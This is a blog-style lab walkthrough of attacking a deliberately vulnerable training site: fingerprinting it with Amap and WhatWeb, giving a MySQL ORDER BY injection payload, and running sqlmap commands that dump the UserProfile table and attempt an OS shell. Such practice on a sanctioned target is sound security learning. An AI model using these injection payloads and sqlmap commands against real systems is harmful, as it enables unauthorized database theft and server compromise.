This site (hackyourselffirst.troyhunt.com) deliberately contains many OWASP Top 10 flaws, so we can practise on it to raise our skill level.

1. First, let's try Amap. As a scanning tool, Amap can probe the version of a web application.

https://tools.kali.org/information-gathering/amap

First, find the IP address of hackyourselffirst.troyhunt.com.

```
$ dig @8.8.8.8 hackyourselffirst.troyhunt.com A

; <<>> DiG 9.10.3-P4-Debian <<>> @8.8.8.8 hackyourselffirst.troyhunt.com A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<-
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;hackyourselffirst.troyhunt.com.    IN  A

;; ANSWER SECTION:
hackyourselffirst.troyhunt.com.                   286  IN  CNAME  hackyourselffirst.azurewebsites.net.
hackyourselffirst.azurewebsites.net.             3586  IN  CNAME  waws-prod-bay-003.vip.azurewebsites.windows.net.
waws-prod-bay-003.vip.azurewebsites.windows.net.  286  IN  CNAME  waws-prod-bay-003.cloudapp.net.
waws-prod-bay-003.cloudapp.net.                    46  IN  A      137.117.17.70

;; Query time: 52 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Nov 20 14:59:53 CST 2017
;; MSG SIZE  rcvd: 223
```

The IP address is 137.117.17.70, and we can also see that hackyourselffirst.troyhunt.com sits behind a chain of aliases (CNAMEs).

Next, use Amap to probe the web application behind it.

```
$ amap -bqv 137.117.17.70 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
Protocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
Protocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
```

The result is not conclusive: Amap matches both the http-iis and the http-apache-2 signatures, so according to it the site could be running IIS or Apache.

Since Amap's result is unsatisfying, try the WhatWeb scanner next.

2. WhatWeb's site is https://www.morningstarsecurity.com/research/whatweb

WhatWeb has many more command-line options.

```
Usage: whatweb [options] <URLs>

TARGET SELECTION:
  <TARGETs>                 Enter URLs, hostnames, IP adddresses, or nmap-format IP ranges.
  --input-file=FILE, -i     Read targets from a file.

AGGRESSION:
  --aggression, -a=LEVEL    Set the aggression level. Default: 1.
  1. Stealthy               Makes one HTTP request per target and also follows redirects.
  3. Aggressive             If a level 1 plugin is matched, additional requests will be made.

PLUGINS:
  --list-plugins, -l        List all plugins.
  --info-plugins, -I=[SEARCH]  List all plugins with detailed information. Optionally search with a keyword.
  --search-plugins=STRING   Search plugins for a keyword.
  --grep, -g=STRING         Search for STRING in HTTP responses. Reports with a plugin named Grep.

OUTPUT:
  --verbose, -v             Verbose output includes plugin descriptions. Use twice for debugging.
  --colour,--color=WHEN     control whether colour is used. WHEN may be `never', `always', or `auto'.

HELP & MISCELLANEOUS:
  --short-help              This short usage help.
  --help, -h                Complete usage help.

EXAMPLE USAGE:
* Scan example.com.
    ./whatweb example.com
* Scan reddit.com slashdot.org with verbose plugin descriptions.
    ./whatweb -v reddit.com slashdot.org
* An aggressive scan of wired.com detects the exact version of WordPress.
    ./whatweb -a 3 www.wired.com
* Scan the local network quickly and suppress errors.
    whatweb --no-errors 192.168.0.0/24
* Scan the local network for HTTPS websites.
    whatweb --no-errors --url-prefix https:// 192.168.0.0/24
* Scan for crossdomain policies in the Alexa Top 1000.
    ./whatweb -i plugin-development/alexa-top-100.txt \
      --url-suffix /crossdomain.xml -p crossdomain_xml

Note: This is the short usage help. For the complete usage help use -h or --help.
```

Probing with WhatWeb yields far more information.

```
$ whatweb -v hackyourselffirst.troyhunt.com
WhatWeb report for http://hackyourselffirst.troyhunt.com
Status    : 200 OK
Title     : Supercar Showdown - Supercar Showdown
IP        : 137.117.17.70
Country   : UNITED STATES, US

Summary   : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]

Detected Plugins:
[ ASP_NET ]
        ASP.NET is a free web framework that enables great Web applications. Used by millions of developers, it runs some of the biggest sites in the world.
        Version      : 4.0.30319 (from X-AspNet-Version HTTP header)
        String       : MVC5.1
        Google Dorks: (2)
        Website     : http://www.asp.net/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The values are not returned to save on space.
        String       : ASP.NET_SessionId
        String       : VisitStart
        String       : ARRAffinity

[ Google-Analytics ]
        This plugin identifies the Google Analytics account.
        Version      : Universal
        Account      : UA-43629727-1
        Website     : http://www.google.com/analytics/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to identify the operating system from the server header.
        String       : Microsoft-IIS/8.0 (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie response header and the browser supports it then the cookie cannot be accessed through client side script - More Info: http://en.wikipedia.org/wiki/HTTP_cookie
        String       : ARRAffinity,ASP.NET_SessionId

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.
        Website     : http://jquery.com/

[ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows Server is a flexible, secure and easy-to-manage Web server for hosting anything on the Web. From media streaming to web application hosting, IIS's scalable and open architecture is ready to handle the most demanding tasks.
        Version      : 8.0
        Website     : http://www.iis.net/

[ Script ]
        This plugin detects instances of script HTML elements and returns the script language/type.
        String       : text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com
        String       : x-aspnetmvc-version (from headers)

[ X-Powered-By ]
        X-Powered-By HTTP header
        String       : ASP.NET (from x-powered-by string)

[ X-XSS-Protection ]
        This plugin retrieves the X-XSS-Protection value from the HTTP header. - More Info: http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.aspx
        String       : 0

HTTP Headers:
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 3276
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/8.0
        Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
        Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
        X-XSS-Protection: 0
        X-AspNetMvc-Version: 5.1
        X-AspNet-Version: 4.0.30319
        X-Powered-By: ASP.NET
        Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
        Date: Mon, 20 Nov 2017 07:53:11 GMT
        Connection: close
```

3. Use sqlmap to test for SQL injection.

URL: http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid

Because the injectable parameter is orderby, the payload has to fit inside an ORDER BY clause. Unfortunately I don't know how to exploit an ORDER BY on SQL Server, so I have to rely on sqlmap. If it were MySQL, the following SQL statement could be used:

```
select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1*(select table_name from information_schema.tables) end)=1;
```

sqlmap is a powerful weapon; in my experiments, all of the following worked. The last one, which dumps the data, takes about 4 to 5 minutes to run.

```
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbs
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-user
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-db
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --column -T UserProfile -D 'hackyourselffirst_db'
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db'
```

Only the --os-shell command did not succeed.

```
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell
```

Still, I'm quite satisfied: sqlmap is a very powerful automated SQL injection tool. One person cannot be expected to master every injectable SQL clause, and this is where sqlmap plays a key role.